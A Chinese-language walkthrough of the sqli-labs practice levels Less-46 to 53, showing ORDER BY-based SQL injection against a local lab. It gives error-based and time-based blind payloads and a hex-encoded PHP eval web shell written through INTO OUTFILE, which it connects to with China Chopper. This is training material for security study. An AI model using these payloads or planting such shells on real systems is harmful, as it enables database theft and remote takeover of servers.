Less-46
补充知识
select * from users order by 1 desc ;使用降序(倒序)排列
select * from users order by 1 asc ;使用升序(正序)排列
select right(database(),1);从右至左输出第一个字母
select lesft(database(),1);从左至右输出第一个字母
lines terminated by *** 每行输出以***结尾
打开第46关,发现一句话 Please input parameter as SORT with numeric value
之前我们都是用id,这一关提示我们用SORT
我们观察源码发现这一关要使用sort代替id
我们输入?sort=1
改变sort后面的数值,1代表把第一列按从小到大进行排列,3 就代表把第3列按从小到大进行排列:
http://127.0.0.1/sqli-labs-master/Less-46/?sort=3
在开头说到了两句升序降序的代码,我们这里试着使用它的后缀
http://127.0.0.1/sqli-labs-master/Less-46/?sort=1 desc 第一列降序排列
http://127.0.0.1/sqli-labs-master/Less-46/?sort=3 asc 第三列升序排列
接下来我们可以注入取数据了
方法一、报错注入
http://127.0.0.1/sqli-labs-master/Less-46/?sort=1 and updatexml(1,concat(0x7e,database()),1)
http://127.0.0.1/sqli-labs-master/Less-46/?sort=1 and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),1),1)
具体语句可以参考第17关的报错注入语句,此处省略
方法二、时间盲注
http://127.0.0.1/sqli-labs-master/Less-46/?sort=1 and if(length(database())=8,1,sleep(5))
http://127.0.0.1/sqli-labs-master/Less-46/?sort=1 and if(left((select schema_name from information_schema.schemata limit 0,1),1)>'a',1,sleep(5)) --+
剩下的语句可以参考第14关的语句
方法三、一句话木马
使用outfile的方法在WWW文件夹下创建文件夹less46 路径注意使用双斜杠
http://127.0.0.1/sqli-labs-master/Less-46/?sort=1 into outfile "C:\phpStudy\WWW\less.php" --+
发现文件虽然有了,但是没有一句话木马,无法与中国菜刀连接
开头我们说到了lines terminated by 0x* 每行输出以0x*结尾 ,将最后添加的这句话转换成16进制
php的一句话是:
<?php @eval($_POST['pass']);?>
http://127.0.0.1/sqli-labs-master/Less-46/?sort=1 into outfile "C:\phpStudy\WWW\less46.php" lines terminated by 0x3c3f70687020406576616c28245f504f53545b276c786b275d293b3f3e --+
打开中国菜刀,右键添加
连接成功,可以访问
Less-47
这一关使用单引号包裹,其他均与第46关相同
Less-48
这一关与第46关几乎一样,区别是这一关没有回显信息,所以不能使用报错注入,可以使用盲注或者一句话木马
Less-49
这一关使用单引号包裹,无回显信息,不能使用报错注入,可以使用盲注或者一句话木马,其他的参考第46关
Less-50
这一关我们首先查看有没有包裹
查看源码,发现使用了mysqli_multi_query() 函数,我们这里可以使用报错注入,盲注,这里我们也可以使用堆叠注入创建新的表,堆叠注入写入一句话木马,这些都可以参考之前的关卡。
Less-51
使用单引号包裹,其余和第50关相同
五种方法
1、报错注入
2、时间或布尔盲注
3、写入一句话木马
4、堆叠注入创建新的user表
5、堆叠注入写入一句话木马
Less-52
这一关没有包裹,没有回显,其余的与第50关基本相同,但我们不能使用报错注入
可以使用如下方法
1、盲注
2、一句话木马
3、堆叠注入创建新的user表
4、堆叠注入写入一句话木马
Less-53
这一关使用单引号进行包裹,无回显信息,不能使用报错注入,其余均和第50关相同
可以使用如下方法
1、盲注
2、一句话木马
3、堆叠注入创建新的user表
4、堆叠注入写入一句话木马